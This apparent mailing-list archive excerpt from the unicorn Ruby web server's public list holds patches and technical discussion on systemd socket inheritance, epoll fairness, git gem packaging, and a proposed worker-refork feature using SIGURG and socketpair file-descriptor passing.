@@ -77,6 +77,7 @@ def initialize(app, options = {})
     options[:use_defaults] = true
     self.config = Unicorn::Configurator.new(options)
     self.listener_opts = {}
+    @immortal = [] # immortal inherited sockets from systemd
 
     # We use @self_pipe differently in the master and worker processes:
     #
@@ -158,6 +159,7 @@ def listeners=(listeners)
     end
     set_names = listener_names(listeners)
     dead_names.concat(cur_names - set_names).uniq!
+    dead_names -= @immortal.map { |io| sock_name(io) }
 
     LISTENERS.delete_if do |io|
       if dead_names.include?(sock_name(io))
@@ -807,17 +809,20 @@ def inherit_listeners!
     # inherit sockets from parents, they need to be plain Socket objects
     # before they become Kgio::UNIXServer or Kgio::TCPServer
     inherited = ENV['UNICORN_FD'].to_s.split(',')
+    immortal = []
 
     # emulate sd_listen_fds() for systemd
     sd_pid, sd_fds = ENV.values_at('LISTEN_PID', 'LISTEN_FDS')
     if sd_pid.to_i == $$ # n.b. $$ can never be zero
       # 3 = SD_LISTEN_FDS_START
-      inherited.concat((3...(3 + sd_fds.to_i)).to_a)
+      immortal = (3...(3 + sd_fds.to_i)).to_a
+      inherited.concat(immortal)
     end
     # to ease debugging, we will not unset LISTEN_PID and LISTEN_FDS
 
     inherited.map! do |fd|
       io = Socket.for_fd(fd.to_i)
+      @immortal << io if immortal.include?(fd)
       io.autoclose = false
       io = server_cast(io)
       set_server_sockopt(io, listener_opts[sock_name(io)])
diff --git a/t/client_body_buffer_size.t b/t/client_body_buffer_size.t
index b1a99f3..3067f28 100644
--- a/t/client_body_buffer_size.t
+++ b/t/client_body_buffer_size.t
@@ -36,7 +36,6 @@ POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
 seek($conf_fh, 0, SEEK_SET);
 truncate($conf_fh, 0);
 print $conf_fh <<EOM;
-listen "$host_port" # TODO: remove this requirement for SIGHUP
 after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
 EOM
 $ar->do_kill('HUP');
diff --git a/t/integration.t b/t/integration.t
index a568758..bb2ab51 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -17,7 +17,6 @@ my $u1 = "$tmpdir/u1";
 print $conf_fh <<EOM;
 early_hints true
 listen "$u1"
-listen "$host_port" # TODO: remove this requirement for SIGHUP
 EOM
 my $ar = unicorn(qw(-E none t/integration.ru -c), $conf, { 3 => $srv });
 my $curl = which('curl');


* [PATCH] epollexclusive: use maxevents=1 for epoll_wait
  @ 2023-03-28 12:24  5%   ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2023-03-28 12:24 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> Interesting patch, I wonder if you have considered RB_ALLOCV_N, e.g:
> 
> https://patch-diff.githubusercontent.com/raw/Shopify/pitchfork/pull/37.patch

Were you able to benchmark an improvement using alloca?
I would think it gets lost in the noise.

I don't like alloca in general since it can make the compiler
over-allocate stack (because default cflags favors speed over
size).  It also makes static analysis more difficult.

But C Ruby is already infested with alloca, so one more/less
likely isn't meaningful.  But, maybe I have a better solution
than either alloca or malloc below.

Been busy dealing with other stuff, but something new just
occurred to me based on something I've abused for over a decade.

Background:

  Outside of unicorn (and COMPLETELY different designs), I've
  abused epoll_wait with maxevents=1 for over a decade because
  it gives the most fairness in multi-threaded cases.  epoll is
  a queue, too, kqueue just got the more appropriate name.

It never occurred to me until right now, but maxevents=1
combined w/ EPOLLEXCLUSIVE should ALSO improve fairness
(compared to maxevents >1 + EPOLLEXCLUSIVE) in a multi-process,
single-threaded environment like unicorn if configured with
multiple listeners.

Explanation in the commit message and code comments below,
hopefully it makes sense.

Anybody willing to benchmark the following on a large SMP
machine?  (I hate consumerism and refuse to have powerful HW)

---------8<--------
Subject: [PATCH] epollexclusive: use maxevents=1 for epoll_wait

This allows us to avoid both malloc (slow) and alloca
(unpredictable stack usage) at the cost of needing to make more
epoll_wait syscalls in a rare case.

In unicorn (and most servers), I expect the most frequent setup
is to have one active listener serving the majority of the
connections, so the most frequent epoll_wait return value would
be 1.

Even with >1 events, any syscall overhead saved by having
epoll_wait retrieve multiple events is dwarfed by Rack app
processing overhead.

Worse yet, if a worker retrieves an event sooner than it can
process it, the kernel (regardless of EPOLLEXCLUSIVE or not) is
able to enqueue another new event to that worker.  In this
example where `a' and `b' are both listeners:

  U=userspace, K=kernel
  K: client hits `a' and `b', enqueues them both (events #1 and #2)
  U: epoll_wait(maxevents: 2) => [ a, b ]
  K: enqueues another event for `b' (event #3)
  U: process_client(a.accept) # this takes a long time

While process_client(a.accept) is happening, `b' can have two
clients pending on a given worker.  It's actually better to
leave the first `b' event unretrieved so the second `b'
event can go to the ep->rdllist of another worker.

The kernel is only capable of enqueuing an item if it hasn't
been enqueued.  Meaning, it's impossible for epoll_wait to ever
retrieve `[ b, b ]' in one call.
---
 ext/unicorn_http/epollexclusive.h | 31 +++++++++++++------------------
 1 file changed, 13 insertions(+), 18 deletions(-)

diff --git a/ext/unicorn_http/epollexclusive.h b/ext/unicorn_http/epollexclusive.h
index 677e1fe..8f4ea9a 100644
--- a/ext/unicorn_http/epollexclusive.h
+++ b/ext/unicorn_http/epollexclusive.h
@@ -64,18 +64,22 @@ static VALUE prep_readers(VALUE cls, VALUE readers)
 
 #if USE_EPOLL
 struct ep_wait {
-	struct epoll_event *events;
+	struct epoll_event event;
 	rb_io_t *fptr;
-	int maxevents;
 	int timeout_msec;
 };
 
 static void *do_wait(void *ptr) /* runs w/o GVL */
 {
 	struct ep_wait *epw = ptr;
-
-	return (void *)(long)epoll_wait(epw->fptr->fd, epw->events,
-				epw->maxevents, epw->timeout_msec);
+	/*
+	 * Linux delivers epoll events in the order received, and using
+	 * maxevents=1 ensures we pluck one item off ep->rdllist
+	 * at-a-time (c.f. fs/eventpoll.c in linux.git, it's quite
+	 * easy-to-understand for anybody familiar with Ruby C).
+	 */
+	return (void *)(long)epoll_wait(epw->fptr->fd, &epw->event, 1,
+					epw->timeout_msec);
 }
 
 /* :nodoc: */
@@ -84,14 +88,10 @@ static VALUE
 get_readers(VALUE epio, VALUE ready, VALUE readers, VALUE timeout_msec)
 {
 	struct ep_wait epw;
-	long i, n;
-	VALUE buf;
+	long n;
 
 	Check_Type(ready, T_ARRAY);
 	Check_Type(readers, T_ARRAY);
-	epw.maxevents = RARRAY_LENINT(readers);
-	buf = rb_str_buf_new(sizeof(struct epoll_event) * epw.maxevents);
-	epw.events = (struct epoll_event *)RSTRING_PTR(buf);
 	epio = rb_io_get_io(epio);
 	GetOpenFile(epio, epw.fptr);
 
@@ -99,17 +99,12 @@ get_readers(VALUE epio, VALUE ready, VALUE readers, VALUE timeout_msec)
 	n = (long)rb_thread_call_without_gvl(do_wait, &epw, RUBY_UBF_IO, NULL);
 	if (n < 0) {
 		if (errno != EINTR) rb_sys_fail("epoll_wait");
-		n = 0;
-	}
-	/* Linux delivers events in order received */
-	for (i = 0; i < n; i++) {
-		struct epoll_event *ev = &epw.events[i];
-		VALUE obj = rb_ary_entry(readers, ev->data.u64);
+	} else if (n > 0) { /* maxevents is hardcoded to 1 */
+		VALUE obj = rb_ary_entry(readers, epw.event.data.u64);
 
 		if (RTEST(obj))
 			rb_ary_push(ready, obj);
-	}
-	rb_str_resize(buf, 0);
+	} /* n == 0 : timeout */
 	return Qfalse;
 }
 #endif /* USE_EPOLL */


* Re: [PATCH] Make the gem usable as a git gem
  @ 2022-07-08 12:12  4% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2022-07-08 12:12 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@gmail.com> wrote:
> Ok, so I’m sorry, but I’ve now tried for hours and
> I can’t for the life of me figure out how to send a patch
> cleanly with the tools I have available.

Ugh, I guess your employer doesn't want you fixing Linux kernel bugs,
either :<

> So you can download the patch here:
> https://github.com/byroot/unicorn/commit/e7f49852875de54cce974c7cbdd5540ddc5e4eeb.patch

OK, I suggest setting up mirrors on repo.or.cz or somewhere
else, as well, for redundancy and accessibility behind
blockades/firewalls.

> —— 
> 
> Bundler allow to install arbitrary revision
> of a gem via its git repository, e.g.
> 
> ```ruby
> gem "unicorn", git: "https://yhbt.net/unicorn.git"
> ```
> 
> But this currently doesn't work with unicorn because
> some files are not committed, and they are only generated
> by the makefile.
> 
> This change would make it much easier to test
> unreleased versions.

Understood; but I'm not in favor of having generated files in
version control due to noise from needless diffs/dirty-states.

And I just had problems in another project because of generated
hunks the other day.

I suggest pointing the gemfile towards your own repo and
rebasing this patch on top of upstream, instead.
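For example, a Gemfile entry along these lines (the repository URL and
branch name below are placeholders, not real upstream locations):

```ruby
# your own fork carrying the generated files, rebased on upstream
gem 'unicorn', git: 'https://example.com/yourname/unicorn.git',
               branch: 'git-gem'
```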

> NB: I didn't commit ext/unicorn_http/unicorn_http.c
> because I think you might as well generate it and commit
> it yourself so that you don't have to review it.

Minor changes to the .rl files (or Ragel itself) can lead to noisy
comment/whitespace changes; and a constant dirty index if two
contributors are using different revisions of Ragel[1].

I encounter constant dirty index with autotools and gnulib-using
projects across different systems, too; and it's a PITA to deal
with when trying to fix platform-specific bugs.

> --- /dev/null
> +++ b/lib/unicorn/version.rb
> @@ -0,0 +1 @@
> +Unicorn::Const::UNICORN_VERSION = '6.1.0.dirty'

That's a regression: a version based on `git describe'
can be quite informative, especially when somebody isn't
sure if they've loaded the correct version or not.



[1] on a side note, I started getting rid of the Ragel dependency
    last year (replacing with vendored picohttpparser), but got
    sidetracked with Real-Life crap which I'm still dealing with.
    The problem is Ragel 7 (experimental) won't be compatible with
    6, and FreeBSD only packages 7 while Debian-based is staying
    with 6 for now.  There were nasty incompatibilities going from
    Ragel 5->6 back in the Mongrel days, too; so I'd rather just go
    with a standalone C parser I've been abusing elsewhere.


* Re: [PATCH] Master promotion with SIGURG (CoW optimization)
       [not found]           ` <CANPRWbHTNiEcYq5qhN6Kio8Wg9a+2gXmc2bAcB2oVw4LZv8rcw@mail.gmail.com>
       [not found]             ` <CANPRWbGArasDtbAej4LsCOGeYZSrNz87p5kLjG+x__jHAn-5ng@mail.gmail.com>
@ 2022-07-08  0:30  0%         ` Eric Wong
  1 sibling, 0 replies; 200+ results
From: Eric Wong @ 2022-07-08  0:30 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:

(fully quoting original message for archival purposes, original
was sent privately)

> > SIGURG is fine, having SIGUSR2 mean two things seems fragile and error-prone
> 
> Ack.
> 
> 
> > I'm fine with requiring Linux for this feature, existing
> > features need to continue working on *BSD...
> 
> Sounds good.
> 
> 
> > *_fork callbacks already work for your current patch, though, right?;
> > so hopefully *_refork won't be needed...
> 
> Yeah, I don't think it's necessary.
> 
> > sidenote: no need for kgio, I've been meaning to get rid of it
> > (Ruby 2.3+ has everything we'd need, I think...)
> 
> Yes. I just didn't want to make such change in my patch.
> I can send a patch to remove kgio and require Ruby 2.3 if you wish.

I don't think Ruby 2.3+ is even necessary, just yet, nor kgio.
None of these new code paths should be exception-intensive enough to be
a performance problem.

> > I would prefer this Linux-only approach if it gets rid of PID
> > files and doesn't introduce new temporary files/FIFOs.
> 
> Ack. I'll get back to that one then.
> 
> > It seems socketpair(..., SOCK_SEQPACKET) can be used for
> > packetized bidirectional IPC, perhaps with send_io + recv_io iff
> > necessary.  There shouldn't be any need for new, fragile FS
> > interactions.
> 
> Hum. I'm not familiar with socketpair, I'll have to read on it.

SOCK_SEQPACKET has worked well on Linux for ages; and seems to
work well on FreeBSD 12+, at least; but I haven't tried it on
other OSes...

socketpair itself is ancient and every *nix has it (but only
SOCK_STREAM and SOCK_DGRAM, SOCK_SEQPACKET came a bit later).

> > Another idea, have you considered letting master work on some requests?
> > Signal handling would be delayed, and EINTR handling bugs in
> > gems could be exposed, but it'd be completely portable...
> 
> I haven't considered it no, but I'm not really keen on it, because if you do
> this, requests handled by the master can't be timed out.

OK, fair enough.

> If anything, the reliable timeout is the number one reason why I still
> believe unicorn
> is the superior server out there.

/me hides under a desk :<

Honestly, you have no idea how embarrassed I am of that (mis)feature.

> > It depends on whether the monitoring process/library can work
> > with other Rack servers, probably; and signal compatibility.
> 
> That's a good point. Assuming unicorn and puma both do reforking on SIGURG,
> then that monitoring process could work with both. Not a bad idea.
> 
> > >   - Many endpoints require database and other network access you probably
> > >     don't want in the master.
> >
> > Wouldn't the *_fork hooks handle that, anyways?
> 
> They are supposed to yes. But I suspect many apps currently work fine
> because some connections are lazily established on first access and just never
> accessed as part of the boot process.
> 
> Once you enable reforking, you might realize that you are missing some code
> in `before_fork`.

OK, fair enough.  I think it's simpler to tell people to improve
existing hooks than introduce new names for similar concepts
(and likely a chunk of duplicated code in their configs)

> > >   - Endpoints may have side effects.
> >
> > Yeah, this would optimize the GET endpoints, at least.
> 
> Well, `GET` endpoints may have side effects too, e.g. a visit counter.
> 
> > Nope, still wrapped.  According to the git-format-patch(1) manpage,
> > Thunderbird can work w/o extensions, actually.
> 
> Damn it, I sent that one using GMail's plain text mode.
> 
> I'm sorry but my work laptop is kinda locked down, so I'm very limited
> in my choice of mail clients. I'll try to send it from my personal computer.

OK, your initial message was from Thunderbird and probably close;
so I figure git@vger.kernel.org could use the feedback if the
git manpage has fallen out-of-date.

> Also less convenient for you, but I guess you can pull my fork:
> 
> git@github.com:casperisfine/unicorn.git
> 
> The two branches are: master-promote and worker-refork.

That would be: https://github.com/casperisfine/unicorn.git

Anonymous HTTPS is mostly fine (more steps to quote/reply to,
and inaccessible offline)

Registration is what I have major problems with.

> > I'm fine with "maintaining it" if it just means Cc-ing you on
> > bugs related to this :>
> 
> Oh that's fine, that was pretty much implied.


* Re: [PATCH] Master promotion with SIGURG (CoW optimization)
       [not found]             ` <CANPRWbGArasDtbAej4LsCOGeYZSrNz87p5kLjG+x__jHAn-5ng@mail.gmail.com>
@ 2022-07-08  0:13  2%           ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2022-07-08  0:13 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> >> It seems socketpair(..., SOCK_SEQPACKET) can be used for
> >> packetized bidirectional IPC, perhaps with send_io + recv_io iff
> >> necessary.  There shouldn't be any need for new, fragile FS
> >> interactions.
> 
> > Hum. I'm not familiar with socketpair, I'll have to read on it.

Please keep unicorn-public@yhbt.net Cc-ed for archival purposes
in case I'm arrested/kidnapped/killed.  I'll quote and reply to
your other message separately, no need to resend.

> Could you clarify what you had in mind? Because I've read on socketpair, and
> from my understanding it's similar to anonymous pipes, as they have to
> be created prior to forking.

It's bidirectional, and you can use send_io/recv_io to send
pipes or any other IO objects across.  SOCK_SEQPACKET
(sequenced-packet) also frees you from having to deal with
splitting on message boundaries or interleaving.

Ruby's send_io/recv_io does have a weakness in that it can't
send a useful string buffer along with the IO object, but a little
C can be used with sendmsg/recvmsg to make it happen (but
sendmsg + send_io is probably fine)

Ruby's socket ext just sends a 1 byte dummy padding buffer, but
it can allow whatever the socket buffers can handle (over 200k,
IIRC).

This should allow a socketpair created from the master to
communicate bidirectionally with any of its kids.

If you don't feel like writing C, it might be easier to have
two socketpairs:

1) for string buffer messages
2) another exclusively for send_io/recv_io
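As a rough, runnable Ruby sketch of the single-socketpair sendmsg +
send_io pattern described above (illustrative only, not unicorn code;
assumes SOCK_SEQPACKET support, i.e. Linux or FreeBSD 12+):

```ruby
require 'socket'

parent_end, child_end = UNIXSocket.pair(:SEQPACKET)
r, w = IO.pipe

pid = fork do
  parent_end.close
  r.close
  child_end.sendmsg("#{$$}-#{w.stat.ino}") # one message, boundaries kept
  child_end.send_io(w)                     # then the IO object itself
  exit!(0)
end
child_end.close
w.close

msg, = parent_end.recvmsg    # "#{worker_pid}-#{inode}"
io = parent_end.recv_io(IO)  # the pipe write-end sent by the child
io.write('ready')
io.close
Process.waitpid(pid)
data = r.read
puts data # => "ready"
```

Note the same non-atomicity caveat applies here: if the child dies
between sendmsg and send_io, the parent hangs in recv_io.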

> So if we start forking from a worker, I don't see how the new worker and
> the master can open a line of communication without exchanging on the
> filesystem.

If you're sending one end of a pipe from the worker to master:

   m1, w1 = socketpair ...
   m2, w2 = socketpair ...

   w1.sendmsg("#$$-#{io.stat.ino}")
   w2.send_io(io)

And the master will:

   m1.recvmsg => "#{worker_pid}-#{inode}"
   m2.recv_io => map inode of received IO to worker

One major weakness of the above is the non-atomicity if a worker
dies in between w1.sendmsg and w2.send_io; the master would
be hanging on m2.recv_io.

This is why having a bit of C to bundle the IO object with
sendmsg/recvmsg in a single syscall would be nice (along with
saving 2 FDs).


Fwiw, here's the equivalent send/recv wrappers I wrote for Perl
Inline::C a while back, but it should be easy to translate into
Ruby's C API.

In case you can't infer what the Sv* functions do by name,
pretty much all the Perl C API is documented in the perlapi(1)
manpage.  Perl's API was easy enough for a doof like me to learn
after doing Ruby C for a bit...

/* allow send/recv of up to 10 IO objects at once */
#define SEND_FD_CAPA 10
#define SEND_FD_SPACE (SEND_FD_CAPA * sizeof(int))
union my_cmsg {
	struct cmsghdr hdr;
	char pad[sizeof(struct cmsghdr) + 16 + SEND_FD_SPACE];
};

static int sleep_wait(unsigned *tries, int err)
{
	const struct timespec req = { 0, 100000000 }; /* 100ms */
	switch (err) {
	case ENOBUFS: case ENOMEM: case ETOOMANYREFS:
		if (++*tries < 50) {
			fprintf(stderr, "sleeping on sendmsg: %s (#%u)\n",
				strerror(err), *tries);
			nanosleep(&req, NULL);
			return 1;
		}
	default:
		return 0;
	}
}

SV *send_foo(PerlIO *s, SV *svfds, SV *data, int flags)
{
	struct msghdr msg = { 0 };
	union my_cmsg cmsg = { 0 };
	STRLEN dlen = 0;
	struct iovec iov;
	ssize_t sent;
	AV *fds = (AV *)SvRV(svfds);
	I32 i, nfds = av_len(fds) + 1;
	int *fdp;
	unsigned tries = 0;

	if (SvOK(data)) {
		iov.iov_base = SvPV(data, dlen);
		iov.iov_len = dlen;
	}
	if (!dlen) { /* must be non-zero */
		iov.iov_base = &msg.msg_namelen; /* whatever */
		iov.iov_len = 1;
	}
	msg.msg_iov = &iov;
	msg.msg_iovlen = 1;
	if (nfds) {
		if (nfds > SEND_FD_CAPA) {
			fprintf(stderr, "FIXME: bump SEND_FD_CAPA=%d\n", nfds);
			nfds = SEND_FD_CAPA;
		}
		msg.msg_control = &cmsg.hdr;
		msg.msg_controllen = CMSG_SPACE(nfds * sizeof(int));
		cmsg.hdr.cmsg_level = SOL_SOCKET;
		cmsg.hdr.cmsg_type = SCM_RIGHTS;
		cmsg.hdr.cmsg_len = CMSG_LEN(nfds * sizeof(int));
		fdp = (int *)CMSG_DATA(&cmsg.hdr);
		for (i = 0; i < nfds; i++) {
			SV **fd = av_fetch(fds, i, 0);
			*fdp++ = SvIV(*fd);
		}
	}
	do {
		sent = sendmsg(PerlIO_fileno(s), &msg, flags);
	} while (sent < 0 && sleep_wait(&tries, errno));
	return sent >= 0 ? newSViv(sent) : &PL_sv_undef;
}

void recv_foo(PerlIO *s, SV *buf, STRLEN n)
{
	union my_cmsg cmsg = { 0 };
	struct msghdr msg = { 0 };
	struct iovec iov;
	ssize_t i;
	Inline_Stack_Vars;
	Inline_Stack_Reset;

	if (!SvOK(buf))
		sv_setpvn(buf, "", 0);
	iov.iov_base = SvGROW(buf, n + 1);
	iov.iov_len = n;
	msg.msg_iov = &iov;
	msg.msg_iovlen = 1;
	msg.msg_control = &cmsg.hdr;
	msg.msg_controllen = CMSG_SPACE(SEND_FD_SPACE);

	i = recvmsg(PerlIO_fileno(s), &msg, 0);
	if (i < 0)
		Inline_Stack_Push(&PL_sv_undef);
	else
		SvCUR_set(buf, i);
	if (i > 0 && cmsg.hdr.cmsg_level == SOL_SOCKET &&
			cmsg.hdr.cmsg_type == SCM_RIGHTS) {
		size_t len = cmsg.hdr.cmsg_len;
		int *fdp = (int *)CMSG_DATA(&cmsg.hdr);
		for (i = 0; CMSG_LEN((i + 1) * sizeof(int)) <= len; i++)
			Inline_Stack_Push(sv_2mortal(newSViv(*fdp++)));
	}
	Inline_Stack_Done;
}

^ permalink raw reply	[relevance 2%]

* Re: [PATCH] Master promotion with SIGURG (CoW optimization)
  2022-07-06  7:40  2%   ` Jean Boussier
@ 2022-07-07 10:23  3%     ` Eric Wong
       [not found]           ` <CANPRWbHTNiEcYq5qhN6Kio8Wg9a+2gXmc2bAcB2oVw4LZv8rcw@mail.gmail.com>
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2022-07-07 10:23 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> > OK, any numbers from Puma users which can be used to project
> > improvements for unicorn (and other servers)?
> 
> There are some user reports here: https://github.com/puma/puma/issues/2258
> but they are mixed in with reports for two other new features.
> 
> Some reports are up to 20-30% savings, but I'd expect unicorn to benefit
> even more from it, given that typical puma users spawn fewer processes
> than with unicorn.

OK, those numbers sound very good (but I can't view
graphics/screenshots from w3m)

> > > They also include automatic reforking after a predetermined amount
> > > of requests (1k by default).
> >
> > 1k seems like a lot of requests (more on this below)
> 
> Agreed. Shared pages start being invalidated much faster than that.
> 
> > > - master: on `SIGURG`
> > >   - Forward `SIGURG` to a chosen worker.
> >
> > OK, I guess SIGURG is safe to use since nobody else relies on it (right?).
> 
> That's my understanding; an alternative could be to re-use USR2 and have a
> config flag to define whether it is a reexec or refork.

SIGURG is fine, having SIGUSR2 mean two things seems fragile and error-prone

> > Right.  PID file races and corner cases were painful to deal
> > with in the earliest days of this project, and I don't look
> > forward to having to deal with them ever again...
> >
> > It looked like the world was moving towards socket-activation
> > with dedicated process managers and away from fragile PID files;
> > so being self-daemonization dependent seems like a step back.
> 
> Agreed. We're currently running unicorn as PID 1 inside containers
> and I'm not exactly looking forward to having to monitor a PID file.
> 
> Another avenue I explored was to keep the existing master and
> refork from one of the workers like puma, but re-assign the parent
> to the original master using PR_SET_CHILD_SUBREAPER.
> 
> Here are my notes on how it works:
> 
> ### Requirements:
> 
> - Need `PR_SET_CHILD_SUBREAPER`, so Linux 3.4+ only (May 2012)

I'm fine with requiring Linux for this feature, existing
features need to continue working on *BSD...

> - Need `File.mkfifo`, so Ruby 2.3 (Dec 2015), but can be shimmed for older
>   rubies.

I don't think it's necessary to use FIFOs at all (see below)

> ### Flow:
> 
> - master: set `PR_SET_CHILD_SUBREAPER` during boot.
> - master: create a temporary directory (`$TMP`).
> - master: spawn initial workers the old way.
> 
> - master: on `SIGCHLD` (a child died):
>   - Fake signal oldest worker (`SIGURG`).
>   - Write the new worker number in the fake signal pipe (at the same time).
> 
> - worker: on `SIGURG` (should spawn a sibling):
>   - Note: worker fake signals are processed after the current request is
>     completed.
>   - Run `before_fork` callback (MAYBE: need a special `before_refork`
>     callback?)
>   - create a pipe.
>   - daemonize (fork twice so that the new process is attributed to the
>     nearest `CHILD_SUBREAPER`, aka the original master).
>   - wait for the first child to exit.
>   - write into the pipe to signal the parent is dead.
>   - Run `after_fork` callback (MAYBE: need a special `after_refork` callback?)

*_fork callbacks already work for your current patch, though, right?;
so hopefully *_refork won't be needed...

> - new sibling after fork:
>   - wait for the parent to exit (through the temporary pipe).
>   - create a named pipe (`File.mkfifo`) at `$TMP/$WORKER_NUM.pipe`.
>   - create a pidfile at `$TMP/WORKER_NUM.pid`.
>   - Open the named pipe in `IO::RDONLY | IO::NONBLOCK` (otherwise it would
>     block until the master open in write mode).
>     - NB: Need to convert it to a `Kgio::Pipe` with
>       `Kgio::Pipe.for_fd(f.to_i)`, and keep `f` with `autoclose = false`.

sidenote: no need for kgio, I've been meaning to get rid of it
(Ruby 2.3+ has everything we'd need, I think...)

>   - Create the `Unicorn::Worker` instance with that pipe and worker number.
>   - Send `SIGURG` to the parent process (should be the master).
>   - Wait for `SIGCONT` in the named pipe.
>   - enter the worker loop.
> 
> - master: on `SIGURG`:
>   - for each outstanding refork order:
>     - Look for `$TMP/$WORKER_NUM.pid` and `$TMP/$WORKER_NUM.pipe`
>     - Read the pidfile
>     - Open the pipe with `IO::RDONLY | IO::NONBLOCK`
>       - NB: Need to convert it to a `Kgio::Pipe` with
>         `Kgio::Pipe.for_fd(f.to_i)`, and keep `f` with `autoclose = false`.
>     - Delete pidfile and named pipe.
>     - Register that new worker normally.
>     - Write `SIGCONT` into the pipe.
> 
> I can share the patch if you are interested, but the extra complexity
> and Linux only features made me prefer the master-promotion approach.

I would prefer this Linux-only approach if it gets rid of PID
files and doesn't introduce new temporary files/FIFOs.

It seems socketpair(..., SOCK_SEQPACKET) can be used for
packetized bidirectional IPC, perhaps with send_io + recv_io iff
necessary.  There shouldn't be any need for new, fragile FS
interactions.
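
In Ruby terms, that could look like the following sketch (stdlib only;
SOCK_SEQPACKET over AF_UNIX is Linux-specific, and the message contents
here are made up for illustration):

```ruby
require 'socket'

# Packetized, bidirectional IPC over a socketpair; no filesystem state.
master, worker = UNIXSocket.pair(:SEQPACKET)
master.send('refork 3', 0) # one send == one packet, boundaries preserved
cmd = worker.recv(512)     # => "refork 3"
worker.send('ready', 0)
ack = master.recv(512)     # => "ready"
```

send_io/recv_io work over such a pair too, if a descriptor ever needs to
cross the boundary.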


Another idea, have you considered letting master work on some requests?
Signal handling would be delayed, and EINTR handling bugs in
gems could be exposed, but it'd be completely portable...

> > > However it works well enough for demonstration.
> > >
> > > So I figured I'd ask whether the feature is desired upstream
> > > before investing more effort into it.
> >
> > It really depends on:
> >
> > 1) what memory savings and/or speedups can be achieved
> >
> > 2) what support can we expect from you (and other users) for
> >    this feature and potential regressions going forward?
> >
> > I don't have the free time nor mental capacity to deal with
> > fallout from major new features such as this, myself.
> 
> Yeah, this is just an RFC, I wouldn't submit a final patch without
> first deploying it on our infra with good results. I'm just on the
> fence between trying to get this upstream vs maintaining our own
> server that solely works like this, hence somewhat simpler and that
> can make more assumptions.

Of course you also realize unicorn remains culturally-incompatible
with 99.9% of the open source world since I refuse to rely on
graphics drivers to work on a daemon, proprietary software,
terms-of-service, etc...

If anything goes wrong, I'd likely CC you anyways.

> > The hook interface would be yet another documentation+support
> > burden I'm worried about (and also more unicorn-specific stuff
> > to lock people in :<).
> 
> Understandable. I suppose it can be done with a monitoring process.
> Check `smaps_rollup` and send `SIGURG` when deemed necessary.
> 
> More moving pieces, but it keeps unicorn simpler.

*shrug*  I've also been favoring more vertical integration in
other places to keep the overall stack simpler.

It depends on whether the monitoring process/library can work
with other Rack servers, probably; and signal compatibility.

> > A completely different idea which should achieve the same goal,
> > completely independent of unicorn:
> >
> >   App startup/loading can be made to trigger warmup paths which
> >   hit common endpoints.  IOW, app loading could run a small
> >   warmup suite which simulates common requests to heat up caches
> >   and trigger JIT.
> 
> Yeah, I don't really believe in this for a few reasons:
> 
>   - That would slow boot time.

Yes, and startup time is already a nasty thing, anyways...

>   - On large apps there are just too many codepaths for this to be realistic.

I was thinking a lazy solution could be to have some middleware
measure coverage and log requests to support auto-replay, somehow.

>   - Many endpoints require database and other network access you probably
>     don't want in the master.

Wouldn't the *_fork hooks handle that, anyways?

>   - Endpoints may have side effects.

Yeah, this would optimize the GET endpoints, at least.
Not sure what percentage of POST needs to be optimized...

> > Ultimately (long-term for ruby-core), it would be better to make
> > JIT (and perhaps even VM cache) results persistent and shareable
> > across different processes, somehow...  That would help all Ruby
> > tools, even short-lived CLI tools.  Portable locking would be a
> > pain, I suppose, but proprietary OSes are always a pain :P
> 
> Based on my limited understanding of both JIT and VM caches, I don't think
> that's really possible.

Ugh, I still think it can be made possible, somehow.  But I no longer
use Ruby for new projects...

> The VM itself could definitely do better CoW wise, and I have some proposals
> on that front (https://bugs.ruby-lang.org/issues/18885) but that will take
> time and will never be perfect.
> 
> That's why I think periodically promoting a new master has potential.
> 
> > There's some line-wrapping issues caused by your MUA;
> 
> Urk. Ok, trying another client now, and I'll resend the patch.

Nope, still wrapped.  According to the git-format-patch(1) manpage,
Thunderbird can work w/o extensions, actually.

IME attachments mostly work well nowadays (test sending
to yourself and using "git am" to apply, first, of course).
Most on vger will disagree with me on attachments, though...

"git send-email" and "git imap-send" remain the recommended
options, but mutt works well, too.

> > Perhaps documenting this as experimental and subject to removal
> > at any time would make the addition of a major new feature an
> > easier pill to swallow; but I still think this is better outside
> > of app servers.
> 
> Up to you, if you don't feel like maintaining such a feature I would
> perfectly understand.

I'm fine with "maintaining it" if it just means Cc-ing you on
bugs related to this :>

^ permalink raw reply	[relevance 3%]

* Re: [PATCH] Master promotion with SIGURG (CoW optimization)
  2022-07-06  2:33  3% ` Eric Wong
@ 2022-07-06  7:40  2%   ` Jean Boussier
  2022-07-07 10:23  3%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Jean Boussier @ 2022-07-06  7:40 UTC (permalink / raw)
  Cc: unicorn-public

> OK, any numbers from Puma users which can be used to project
> improvements for unicorn (and other servers)?

There are some user reports here: https://github.com/puma/puma/issues/2258
but they are mixed in with reports for two other new features.

Some reports are up to 20-30% savings, but I'd expect unicorn to benefit
even more from it, given that typical puma users spawn fewer processes
than with unicorn.

> > They also include automatic reforking after a predetermined amount
> > of requests (1k by default).
>
> 1k seems like a lot of requests (more on this below)

Agreed. Shared pages start being invalidated much faster than that.

> > - master: on `SIGURG`
> >   - Forward `SIGURG` to a chosen worker.
>
> OK, I guess SIGURG is safe to use since nobody else relies on it (right?).

That's my understanding; an alternative could be to re-use USR2 and have a
config flag to define whether it is a reexec or refork.

> Right.  PID file races and corner cases were painful to deal
> with in the earliest days of this project, and I don't look
> forward to having to deal with them ever again...
>
> It looked like the world was moving towards socket-activation
> with dedicated process managers and away from fragile PID files;
> so being self-daemonization dependent seems like a step back.

